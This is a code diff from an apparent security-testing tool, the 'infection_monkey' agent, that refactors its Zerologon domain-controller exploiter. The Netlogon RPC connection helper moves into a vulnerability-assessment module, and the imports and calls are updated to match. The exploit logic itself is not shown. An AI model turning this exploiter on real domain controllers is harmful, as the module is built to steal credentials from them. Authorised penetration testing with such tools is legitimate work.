diff --git a/monkey/infection_monkey/exploit/zerologon.py b/monkey/infection_monkey/exploit/zerologon.py index 75e7d96f0..0a1dd8d6e 100644 --- a/monkey/infection_monkey/exploit/zerologon.py +++ b/monkey/infection_monkey/exploit/zerologon.py @@ -12,11 +12,10 @@ from binascii import unhexlify from typing import Dict, List, Optional, Sequence, Tuple import impacket -from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport +from impacket.dcerpc.v5 import nrpc, rpcrt from impacket.dcerpc.v5.dtypes import NULL from common.agent_events import CredentialsStolenEvent, PasswordRestorationEvent -from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.credentials import Credentials, LMHash, NTHash, Username from common.tags import ( T1003_ATTACK_TECHNIQUE_TAG, @@ -27,7 +26,11 @@ from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.tools.wmi_tools import WmiTools from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump -from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable +from infection_monkey.exploit.zerologon_utils.vuln_assessment import ( + connect_to_dc, + get_dc_details, + is_exploitable, +) from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec from infection_monkey.i_puppet import ExploiterResultData from infection_monkey.utils.capture_output import StdoutCapture @@ -113,16 +116,6 @@ class ZerologonExploiter(HostExploiter): return self.exploit_result - @staticmethod - def connect_to_dc(dc_ip) -> object: - binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp") - rpc_transport = transport.DCERPCTransportFactory(binding) - rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT) - rpc_con = rpc_transport.get_dce_rpc() - rpc_con.connect() - rpc_con.bind(nrpc.MSRPC_UUID_NRPC) - return rpc_con - def _send_exploit_rpc_login_requests(self, rpc_con) -> bool: for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt): exploit_attempt_result = self.try_exploit_attempt(rpc_con) @@ -230,7 +223,7 @@ class ZerologonExploiter(HostExploiter): # Connect to the DC's Netlogon service. try: - rpc_con = ZerologonExploiter.connect_to_dc(self.dc_ip) + rpc_con = connect_to_dc(self.dc_ip) except Exception as e: logger.info(f"Exception occurred while connecting to DC: {str(e)}") return False diff --git a/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py b/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py index 9690ce1a8..ba09a1cec 100644 --- a/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py +++ b/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py @@ -2,9 +2,9 @@ import logging from typing import Optional, Tuple import nmb.NetBIOS -from impacket.dcerpc.v5 import nrpc, rpcrt +from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport -from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT +from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT from common.utils.exceptions import DomainControllerNameFetchError from infection_monkey.model import VictimHost from infection_monkey.utils.threading import interruptible_iter @@ -12,6 +12,16 @@ from infection_monkey.utils.threading import interruptible_iter logger = logging.getLogger(__name__) +def connect_to_dc(dc_ip) -> object: + binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp") + rpc_transport = transport.DCERPCTransportFactory(binding) + rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT) + rpc_con = rpc_transport.get_dce_rpc() + rpc_con.connect() + rpc_con.bind(nrpc.MSRPC_UUID_NRPC) + return rpc_con + + def get_dc_details(host: VictimHost) -> Tuple[str, str, str]: dc_ip = host.ip_addr dc_name = _get_dc_name(dc_ip=dc_ip) @@ -39,7 +49,7 @@ def _get_dc_name(dc_ip: str) -> str: def is_exploitable(zerologon_exploiter_object) -> Tuple[bool, Optional[rpcrt.DCERPC_v5]]: # Connect to the DC's Netlogon service. try: - rpc_con = zerologon_exploiter_object.connect_to_dc(zerologon_exploiter_object.dc_ip) + rpc_con = connect_to_dc(zerologon_exploiter_object.dc_ip) except Exception as err: error_message = f"Exception occurred while connecting to DC: {err}" logger.info(error_message)